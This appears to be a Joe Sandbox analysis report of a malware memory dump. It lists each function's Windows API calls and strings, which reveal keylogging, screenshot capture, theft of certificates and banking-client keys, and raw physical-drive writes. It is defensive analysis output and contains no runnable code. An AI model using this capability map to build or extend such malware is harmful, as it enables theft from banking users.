FindFirstFileA.KERNEL32(?,?), ref: 02D1E2DD
SetErrorMode.KERNEL32(?), ref: 02D1E5F3

Strings

5C5905E0, xrefs: 02D1E35F, 02D1E36A, 02D1E464, 02D1E46F
*.00*, xrefs: 02D1E2BA
found., xrefs: 02D1E316
keys, xrefs: 02D1E3D9
.txt, xrefs: 02D1E528
asus, xrefs: 02D1E331
path, xrefs: 02D1E4DE
.zip, xrefs: 02D1E428
\t, xrefs: 02D1E364, 02D1E469

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: DriveErrorModememset$CurrentDirectoryFileFindFirstLogicalStringsType
String ID: *.00*$.txt$.zip$5C5905E0$asus$found.$keys$path$\t
API String ID: 989413159-2416317930
Opcode ID: 8e8ee20fbae7461b659c71302d92c0bfe7a97e06ee7c678d9e1c7b0fc7755cba
Instruction ID: 934c2b5e108dccba3e4b4226edc55f3a7e43470629c7ee3de48d85d93e8cd1f6
Opcode Fuzzy Hash: 8e8ee20fbae7461b659c71302d92c0bfe7a97e06ee7c678d9e1c7b0fc7755cba
Instruction Fuzzy Hash: EAC1CE345083469FD725CF34A468BABBBE5AF99304F548A5DE8CAC7340EB31D908CB91

Function 02D0CBF0 Relevance: 54.6, APIs: 29, Strings: 2, Instructions: 342windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(?), ref: 02D0CC4A
IsIconic.USER32(?), ref: 02D0CC55
GetWindowInfo.USER32(?,?), ref: 02D0CCB2
GetAncestor.USER32(?,00000003,?,75A8BCB0,75A73EB0), ref: 02D0CCD7
GetWindow.USER32(?,00000003), ref: 02D0CD50
IsWindow.USER32(?), ref: 02D0CD78
IsIconic.USER32(?), ref: 02D0CD83
memset.MSVCRT ref: 02D0CDB2
GetWindow.USER32(?,00000005), ref: 02D0CDD6
GetWindow.USER32(00000000), ref: 02D0CDD9

Part of subcall function 02D0DA30: GetClassNameA.USER32(?,?,00000101), ref: 02D0DA46

Strings

<, xrefs: 02D0CFC3
<, xrefs: 02D0CEA9

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: Window$Iconic$AncestorClassInfoNamememset
String ID: <$<
API String ID: 3351429209-213342407
Opcode ID: fdc1973a6cfdde1b5709d651730ecffa22645d5600d15626a140c56fcc354707
Instruction ID: b5a0a541bc85e4ddbb399d82e790afe4704cae5e37d4762c8f432da5be745693
Opcode Fuzzy Hash: fdc1973a6cfdde1b5709d651730ecffa22645d5600d15626a140c56fcc354707
Instruction Fuzzy Hash: 10D18D75D10218ABDB20DFA8D888BAEBBB9EF44714F14425AE505A73E0DB749D41CFA0

Function 02D01170 Relevance: 44.0, APIs: 21, Strings: 4, Instructions: 203memorythreadCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 02D0118E
GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,7591F570), ref: 02D011AD
StrStrIA.SHLWAPI(00000000,java), ref: 02D011C5
StrStrIA.SHLWAPI(00000000,.exe), ref: 02D011DB
StrStrIW.SHLWAPI(?,.p12,00000000), ref: 02D011FF
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 02D01221
GetProcessHeap.KERNEL32(00000008,?), ref: 02D0123E
HeapAlloc.KERNEL32(00000000), ref: 02D01245
memset.MSVCRT ref: 02D01255
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 02D01271
CreateThread.KERNEL32(00000000,00000000,02D1AFC0,00000000,00000000,00000000), ref: 02D01285
StrStrIW.SHLWAPI(?,serverkey.dat,00000000), ref: 02D012A4
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 02D012D5
GetProcessHeap.KERNEL32(00000008,?), ref: 02D012F2
HeapAlloc.KERNEL32(00000000), ref: 02D012F9
memset.MSVCRT ref: 02D01309
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 02D01325
CreateThread.KERNEL32(00000000,00000000,02D1E630,00000000,00000000,00000000), ref: 02D01339
CreateThread.KERNEL32(00000000,00000000,02D1FCA0,00000000,00000000,00000000), ref: 02D01376

Part of subcall function 02D1AF10: PathAddBackslashA.SHLWAPI(5c590506), ref: 02D1AF37
Part of subcall function 02D1AF10: PathFileExistsA.SHLWAPI(?), ref: 02D1AFA0

GetHandleInformation.KERNEL32(00000000,?), ref: 02D0138E
CloseHandle.KERNEL32(00000000), ref: 02D0139F

Strings

java, xrefs: 02D011B9
.p12, xrefs: 02D011F9
.exe, xrefs: 02D011CF
serverkey.dat, xrefs: 02D0129E

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: ByteCharHeapMultiWide$CreateThreadmemset$AllocFileHandlePathProcess$BackslashCloseExistsInformationModuleName
String ID: .exe$.p12$java$serverkey.dat
API String ID: 183229269-3502489836
Opcode ID: 7090ae3a4e52a323c5fd86102dc38817a48da897b706f47d53e5f9aa2dd45b46
Instruction ID: 88dad07d811efe6e4551ad264bbb4fcc6dcbdf08f7af077b741ea3752d366fb7
Opcode Fuzzy Hash: 7090ae3a4e52a323c5fd86102dc38817a48da897b706f47d53e5f9aa2dd45b46
Instruction Fuzzy Hash: E351D675A853257BEB305A61AC89FEB3B5C9F15B64F544204BD4CA93C0DBA0DC44CAF0

Function 02D198E0 Relevance: 43.9, APIs: 23, Strings: 2, Instructions: 161threadnetworkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32 ref: 02D1994E
ExitThread.KERNEL32 ref: 02D1995E
socket.WS2_32(00000002,00000001,00000006), ref: 02D1996A
ExitThread.KERNEL32 ref: 02D1997D

Strings

login, xrefs: 02D198F3
pass, xrefs: 02D19914

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: ExitThread$Startupsocket
String ID: login$pass
API String ID: 1705285421-2248183487
Opcode ID: 2fbcebddaa65303176f9d699564ffd3ae3c81141ade9034ace3caa6bbfba468e
Instruction ID: aa6fee45ebaf7764d8d3dccaee91b9ea2c6da75396af06c20f93fcba86877c8a
Opcode Fuzzy Hash: 2fbcebddaa65303176f9d699564ffd3ae3c81141ade9034ace3caa6bbfba468e
Instruction Fuzzy Hash: 2C518D39988300AFD304DF64E898BAABBF5BB89721F404A1DFA65873D0D7709D14CB52

Function 02D1C900 Relevance: 40.5, APIs: 17, Strings: 6, Instructions: 248COMMON

Download Yara Rule

APIs

Part of subcall function 02D24800: memset.MSVCRT ref: 02D24824
Part of subcall function 02D24800: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02D2482F

OpenProcess.KERNEL32(001FFFFF,00000000,00000000,ctunnel.exe,?,74E17390,?), ref: 02D1C92C
GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 02D1C94B
GetHandleInformation.KERNEL32(00000000,?), ref: 02D1C95D
CloseHandle.KERNEL32(00000000), ref: 02D1C96E
PathAddBackslashA.SHLWAPI(5C590552), ref: 02D1C997
CreateDirectoryA.KERNEL32(?,00000000), ref: 02D1C9D1
GetLastError.KERNEL32 ref: 02D1C9DB
IsUserAnAdmin.SHELL32 ref: 02D1C9E3
PathMakeSystemFolderA.SHLWAPI(?), ref: 02D1C9F4
SetLastError.KERNEL32(00000000), ref: 02D1C9FB
GetFileAttributesA.KERNEL32(?), ref: 02D1CA31
SetCurrentDirectoryA.KERNEL32(?), ref: 02D1CA70
PathAddBackslashA.SHLWAPI(5C590552,?,?), ref: 02D1CAB7
PathAddBackslashA.SHLWAPI(5C590552,ctunnel.exe,?,74E17390,?), ref: 02D1CB97
PathFileExistsA.SHLWAPI(?), ref: 02D1CBF9

Strings

5C590552, xrefs: 02D1C992, 02D1C999, 02D1CAB2, 02D1CAB9, 02D1CB92, 02D1CB99
pass.log, xrefs: 02D1CBD8
path_ctunnel.txt, xrefs: 02D1CAF8
ctunnel.exe, xrefs: 02D1C90C
ctunnel.zip, xrefs: 02D1CA10
\, xrefs: 02D1CA4F

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: Path$BackslashFile$CreateDirectoryErrorHandleLast$AdminAttributesCloseCurrentExistsFolderInformationMakeModuleNameOpenProcessSnapshotSystemToolhelp32Usermemset
String ID: 5C590552$\$ctunnel.exe$ctunnel.zip$pass.log$path_ctunnel.txt
API String ID: 3886636124-789741791
Opcode ID: efcc4084f0af05dca3ff0ec02f57c991c26704f612c4d806104e2174066ae087
Instruction ID: 112b0ebcfdaa2fd0fec2c8c7e73a47ad13c54b9f88a105413bffa83316b3cde4
Opcode Fuzzy Hash: efcc4084f0af05dca3ff0ec02f57c991c26704f612c4d806104e2174066ae087
Instruction Fuzzy Hash: 759103349882599FDB12CF24B868BEA7BE4AF45300F2485D6E8CAD7341DB719D48CB91

Function 02D0CE19 Relevance: 35.2, APIs: 18, Strings: 2, Instructions: 171windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 02D0CE28
memset.MSVCRT ref: 02D0CE6B
GetWindowRect.USER32(00000000,00000000), ref: 02D0CE7B
GetWindowLongA.USER32(00000000,000000F0), ref: 02D0CE95
GetScrollBarInfo.USER32(00000000,000000FA,?,?,75A8BCB0,75A73EB0), ref: 02D0CEB0
GetScrollBarInfo.USER32(00000000,000000FB,0000003C,?,75A8BCB0,75A73EB0), ref: 02D0CEDD
GetWindow.USER32(00000000,00000005), ref: 02D0CF15
GetWindow.USER32(00000000), ref: 02D0CF18
IsIconic.USER32(00000000), ref: 02D0CE37

Part of subcall function 02D0C780: IsWindow.USER32(00000000), ref: 02D0C79D
Part of subcall function 02D0C780: IsWindowVisible.USER32(00000000), ref: 02D0C7AC
Part of subcall function 02D0C780: GetWindowRect.USER32(00000000,?), ref: 02D0C7E9
Part of subcall function 02D0C780: GetClassLongA.USER32(00000000,000000E6), ref: 02D0C7F2
Part of subcall function 02D0C780: PrintWindow.USER32(00000000,?,00000000,?,?,75A73EB0,?,?,?,02D090B9), ref: 02D0C805
Part of subcall function 02D0C780: RedrawWindow.USER32(00000000,00000000,00000000,00000485,00000000,?,?,?,75A73EB0,?,?,?,02D090B9), ref: 02D0C82B
Part of subcall function 02D0C780: CreateRectRgn.GDI32(?,?,02D090B9,?), ref: 02D0C841
Part of subcall function 02D0C780: GetWindowRgn.USER32(00000000,00000000), ref: 02D0C84B
Part of subcall function 02D0C780: OffsetRgn.GDI32(00000000,?,?), ref: 02D0C865
Part of subcall function 02D0C780: SelectClipRgn.GDI32(?,00000000), ref: 02D0C870
Part of subcall function 02D0C780: BitBlt.GDI32(?,?,?,02D090B9,?,?,00000000,00000000,00CC0020), ref: 02D0C899

IsWindow.USER32(?), ref: 02D0CF3E
IsIconic.USER32(?), ref: 02D0CF4D
memset.MSVCRT ref: 02D0CF7E
GetWindowRect.USER32(?,00000000), ref: 02D0CF8B
GetWindowLongA.USER32(?,000000F0), ref: 02D0CFA2
GetScrollBarInfo.USER32(?,000000FA,0000003C,?,75A8BCB0,75A73EB0), ref: 02D0CFCD
GetScrollBarInfo.USER32(?,000000FB,0000003C,?,75A8BCB0,75A73EB0), ref: 02D0D005
GetWindow.USER32(?,00000005), ref: 02D0D042
GetWindow.USER32(00000000), ref: 02D0D045

Strings

<, xrefs: 02D0CFC3
<, xrefs: 02D0CEA9

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: Window$InfoRectScroll$Long$Iconicmemset$ClassClipCreateOffsetPrintRedrawSelectVisible
String ID: <$<
API String ID: 3463799249-213342407
Opcode ID: 0069a15caf15f3b2a8cc9d470c27bfe1577d73ff07a771a7874ad63536400051
Instruction ID: 840669515118432bae92f5f555933b5c5bfe4db805352dd88f5e5129e8e790c1
Opcode Fuzzy Hash: 0069a15caf15f3b2a8cc9d470c27bfe1577d73ff07a771a7874ad63536400051
Instruction Fuzzy Hash: BA611575D012189BDB24DFA8D888BDEBBB9EF48314F14425AE408A7390DB746E45CF61

Function 02D221E0 Relevance: 35.2, APIs: 14, Strings: 6, Instructions: 165stringsynchronizationsleepCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 02D22210
PathFindFileNameA.SHLWAPI(?), ref: 02D2221D
PathFileExistsA.SHLWAPI(ISClient.cfg), ref: 02D22232

Part of subcall function 02D07220: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000,?,a3b7fb16a,76EDC3F0,?,?,02D122F0,00000000,00000001), ref: 02D07246
Part of subcall function 02D07220: GetFileSizeEx.KERNEL32(00000000,?,?,?,02D122F0,00000000,00000001,?,7591F550,00000000), ref: 02D07264
Part of subcall function 02D07220: GetProcessHeap.KERNEL32(00000008,?,?,?,02D122F0,00000000,00000001,?,7591F550,00000000), ref: 02D0728D
Part of subcall function 02D07220: RtlAllocateHeap.NTDLL(00000000,?,?,02D122F0,00000000,00000001,?,7591F550,00000000), ref: 02D07294
Part of subcall function 02D07220: memset.MSVCRT ref: 02D072A7
Part of subcall function 02D07220: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D072D3
Part of subcall function 02D07220: LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02D072E3
Part of subcall function 02D07220: ReadFile.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 02D072F2
Part of subcall function 02D07220: UnlockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02D07305
Part of subcall function 02D07220: GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D07314
Part of subcall function 02D07220: HeapValidate.KERNEL32(00000000), ref: 02D0731B

StrStrIA.SHLWAPI(00000000,GKUZ=,?,00000000,00000001), ref: 02D2227D
strstr.MSVCRT ref: 02D2229D
strstr.MSVCRT ref: 02D222AF
CreateMutexA.KERNEL32(00000000,00000000,Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}), ref: 02D222DE
Sleep.KERNEL32(000003E8), ref: 02D222EF
ReleaseMutex.KERNEL32(00000000), ref: 02D222F6
GetHandleInformation.KERNEL32(00000000,?), ref: 02D22308
CloseHandle.KERNEL32(00000000), ref: 02D22319
GetPrivateProfileStringA.KERNEL32(General,DefaultPrivateDir,00000000,?,00000104,?), ref: 02D22367
CharUpperA.USER32(?), ref: 02D2237E
CharUpperA.USER32(?), ref: 02D22387

Strings

GKUZ=, xrefs: 02D22277
DefaultPrivateDir, xrefs: 02D2235A
General, xrefs: 02D2235F
interpro.ini, xrefs: 02D22327
Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}, xrefs: 02D222D5
ISClient.cfg, xrefs: 02D2222D, 02D22240

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: File$Heap$CharCreateHandleMutexNamePathProcessUpperstrstr$AllocateCloseExistsFindInformationLockModulePointerPrivateProfileReadReleaseSizeSleepStringUnlockValidatememset
String ID: DefaultPrivateDir$GKUZ=$General$ISClient.cfg$Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}$interpro.ini
API String ID: 225490952-373839803
Opcode ID: 07309bb584f8ec9c140408bcd91eaab1538e8315637d864beee92b3e26132490
Instruction ID: 5c14c2c2e4865c91bb7091a3443cd4db5c10a0f0b3ab8c5f10609fd04c15d298
Opcode Fuzzy Hash: 07309bb584f8ec9c140408bcd91eaab1538e8315637d864beee92b3e26132490
Instruction Fuzzy Hash: 015125749803619BE7318F20A998BAA7BF4AF65308F148498FCC597300DB71ED48CB60

Function 02D250E0 Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 174COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 02D250EE
GetWindowDC.USER32(00000000), ref: 02D250F5
CreateCompatibleDC.GDI32(00000000), ref: 02D2510A

Strings

(, xrefs: 02D25162
BM, xrefs: 02D2524C

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: Window$CompatibleCreateDesktop
String ID: ($BM
API String ID: 3720047489-2980357723
Opcode ID: b5b44240cc2848f5222b95e16f31b65d405b2abc1ad8ac3ef7fc3f1b9a34d374
Instruction ID: 679036cbc666af737a547abd7160dd24c8136dfbf4aa5348dbbea472e003190f
Opcode Fuzzy Hash: b5b44240cc2848f5222b95e16f31b65d405b2abc1ad8ac3ef7fc3f1b9a34d374
Instruction Fuzzy Hash: 9C517FB5D40218AFDB10DFA4E888BAEB7BDEF58314F904559F904AB340D7749D158BA0

Function 02D11660 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 121memorystringCOMMON

Download Yara Rule

APIs

GetCommandLineA.KERNEL32(\iexplore.exe), ref: 02D1166E
StrStrIA.SHLWAPI(00000000), ref: 02D11675
memset.MSVCRT ref: 02D116F0
IsUserAnAdmin.SHELL32 ref: 02D116F9
GetProcessHeap.KERNEL32(00000000,00000000,00000000,00000001,7591F550,75921620,80000002), ref: 02D11743
HeapValidate.KERNEL32(00000000), ref: 02D11746
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D11753
HeapFree.KERNEL32(00000000), ref: 02D11756
strstr.MSVCRT ref: 02D11766
strstr.MSVCRT ref: 02D11780
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D117AF
HeapValidate.KERNEL32(00000000), ref: 02D117B2
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D117BF
HeapFree.KERNEL32(00000000), ref: 02D117C2

Strings

\iexplore.exe, xrefs: 02D11669
set_url , xrefs: 02D11760, 02D11777

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$FreeValidatestrstr$AdminCommandLineUsermemset
String ID: \iexplore.exe$set_url
API String ID: 2523706361-3242205626
Opcode ID: f3d6a197134c5db5f3aa67a4001ea0943169df7976d05da268d142b582b705bc
Instruction ID: b6e361a1e664b97740b9e77e677cb0129658e41b0e16666a195470238929a852
Opcode Fuzzy Hash: f3d6a197134c5db5f3aa67a4001ea0943169df7976d05da268d142b582b705bc
Instruction Fuzzy Hash: 26310835E8525077E7212A707C89B5B3B89DF11B55F180518EF49AB741EAA4CC44C6E1

Function 02D12B50 Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 169memoryCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 02D12B82

Part of subcall function 02D12A90: GetAncestor.USER32(00000000,00000002,?,00000000), ref: 02D12A9E
Part of subcall function 02D12A90: GetWindowTextA.USER32(00000000,?,00000104), ref: 02D12AB9
Part of subcall function 02D12A90: GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D12B17
Part of subcall function 02D12A90: HeapValidate.KERNEL32(00000000), ref: 02D12B1A
Part of subcall function 02D12A90: GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D12B27
Part of subcall function 02D12A90: HeapFree.KERNEL32(00000000), ref: 02D12B2A

GetProcessHeap.KERNEL32(00000008,00000014,?,?,?,00000000), ref: 02D12BE5
HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 02D12BEC
memset.MSVCRT ref: 02D12BFF
GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,00000000), ref: 02D12C0F
HeapValidate.KERNEL32(00000000,?,?,00000000), ref: 02D12C16
GetProcessHeap.KERNEL32(00000008,02D14181,?,?,?,00000000), ref: 02D12C36
HeapReAlloc.KERNEL32(00000000,?,?,00000000), ref: 02D12C3D

Strings

[bks], xrefs: 02D12C78
[del], xrefs: 02D12CBB
[ret], xrefs: 02D12C90
[ins], xrefs: 02D12CD0
[tab], xrefs: 02D12CA6

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocValidatememset$AncestorFreeTextWindow
String ID: [bks]$[del]$[ins]$[ret]$[tab]
API String ID: 4095246728-233650549
Opcode ID: a616690679d48e53ffb035557479e4611e023af9b337a239b096cc3e5d3bb478
Instruction ID: 901dce768346ff07385b063f348c3fa287c01986290aa6f6cc562f0d62db3c03
Opcode Fuzzy Hash: a616690679d48e53ffb035557479e4611e023af9b337a239b096cc3e5d3bb478
Instruction Fuzzy Hash: A851CF78D40269ABCB14CF65E858BEABBF5FF54700F04859AED45AB744E7319E00CBA0

Function 02D01660 Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 61libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,7591F550,7591DF10,75A7BD50), ref: 02D0167A
GetModuleHandleA.KERNEL32(kernel32.dll), ref: 02D0168B
GetProcAddress.KERNEL32(00000000,CreateFileW), ref: 02D0169F
StrStrIA.SHLWAPI(?,\explorer.exe), ref: 02D016C1
GetProcAddress.KERNEL32(00000000,GetFileAttributesW), ref: 02D016D1

Part of subcall function 02D1A040: VirtualAlloc.KERNEL32(00000000,-00000008,00003000,00000040,7591F550,00000000,75A7BD50,?,?,?,02D1938A,00000000,02D191E0,02D5A04C), ref: 02D1A078
Part of subcall function 02D1A040: memcpy.MSVCRT ref: 02D1A0A0
Part of subcall function 02D1A040: VirtualProtect.KERNEL32(00000000,?,00000040,02D1938A,?,?,?,?,?,?,02D1938A,00000000,02D191E0,02D5A04C), ref: 02D1A135
Part of subcall function 02D1A040: VirtualProtect.KERNEL32(?,00000000,00000040,02D1938A,?,?,?,?,?,?,02D1938A,00000000,02D191E0,02D5A04C), ref: 02D1A14A

GetModuleHandleA.KERNEL32(user32.dll), ref: 02D016EC
GetProcAddress.KERNEL32(00000000,GetWindowTextA), ref: 02D016F8

Strings

\explorer.exe, xrefs: 02D016B5
user32.dll, xrefs: 02D016E7
GetFileAttributesW, xrefs: 02D016CB
GetWindowTextA, xrefs: 02D016F2
kernel32.dll, xrefs: 02D01686
CreateFileW, xrefs: 02D01699

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: AddressModuleProcVirtual$HandleProtect$AllocFileNamememcpy
String ID: CreateFileW$GetFileAttributesW$GetWindowTextA$\explorer.exe$kernel32.dll$user32.dll
API String ID: 1733008709-77332811
Opcode ID: b7b59c2166eed22945dd3276c40cbd68d430eea9a551fe2af8de8ecfb53cfab9
Instruction ID: f42faa4395f2120181e5a6a5c9d66f1804c7aa22e8fb8c34e97759347a7ba646
Opcode Fuzzy Hash: b7b59c2166eed22945dd3276c40cbd68d430eea9a551fe2af8de8ecfb53cfab9
Instruction Fuzzy Hash: 4F01847178135673FA206AB57CC6F9A339C6B65B59F840510BA4EB2390DEA4DC08C5B8

Function 02D13000 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 104fileCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 02D13021
GetDriveTypeA.KERNEL32(02D5DFC4,?,?,?), ref: 02D13038
SetCurrentDirectoryA.KERNEL32(02D5DFC4,?,?,?), ref: 02D13048
_snprintf.MSVCRT ref: 02D13075
CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000003,A0000000,00000000), ref: 02D13097
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,00000000,75919300), ref: 02D130C1
LockFile.KERNEL32(00000000,00000000,00000000,00000104,00000000), ref: 02D130D0
WriteFile.KERNEL32(00000000,?,00000104,00000000,00000000), ref: 02D130E9
UnlockFile.KERNEL32(00000000,00000000,00000000,00000104,00000000), ref: 02D130FA
GetHandleInformation.KERNEL32(00000000,?), ref: 02D13117
CloseHandle.KERNEL32(00000000), ref: 02D13128

Strings

\\.\PhysicalDrive%u, xrefs: 02D13064

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: File$Handle$CloseCreateCurrentDirectoryDriveInformationLockPointerTypeUnlockWrite_snprintfmemset
String ID: \\.\PhysicalDrive%u
API String ID: 649538874-3292898883
Opcode ID: 585797609a850c238a6c28d78318fbe02d2bfde9fd94863497859f5fe0b2eee8
Instruction ID: 7d89559668bd58f50b37ebe50e1325974031bafbdb049217ce2bc9e2e98419be
Opcode Fuzzy Hash: 585797609a850c238a6c28d78318fbe02d2bfde9fd94863497859f5fe0b2eee8
Instruction Fuzzy Hash: 59310279D81214BBE7209F50EC49FEE77AC9B15B14F604585FA09AA2C0C7F41E84CBE5

Function 02D23910 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 61COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 02D23927
PathFindFileNameA.SHLWAPI(?), ref: 02D23934
GetPrivateProfileStringA.KERNEL32(General,DefaultPrivateDir,00000000,?,00000104,?), ref: 02D23984
CharUpperA.USER32(?), ref: 02D2399C
CharUpperA.USER32(?), ref: 02D239A5
StrStrIA.SHLWAPI(?,?), ref: 02D239B5

Part of subcall function 02D23770: PathAddBackslashA.SHLWAPI(02D5D098), ref: 02D237A0
Part of subcall function 02D23770: CreateDirectoryA.KERNEL32(?,00000000), ref: 02D237E1
Part of subcall function 02D23770: GetLastError.KERNEL32 ref: 02D237EB
Part of subcall function 02D23770: IsUserAnAdmin.SHELL32 ref: 02D237F3
Part of subcall function 02D23770: PathMakeSystemFolderA.SHLWAPI(?), ref: 02D23804
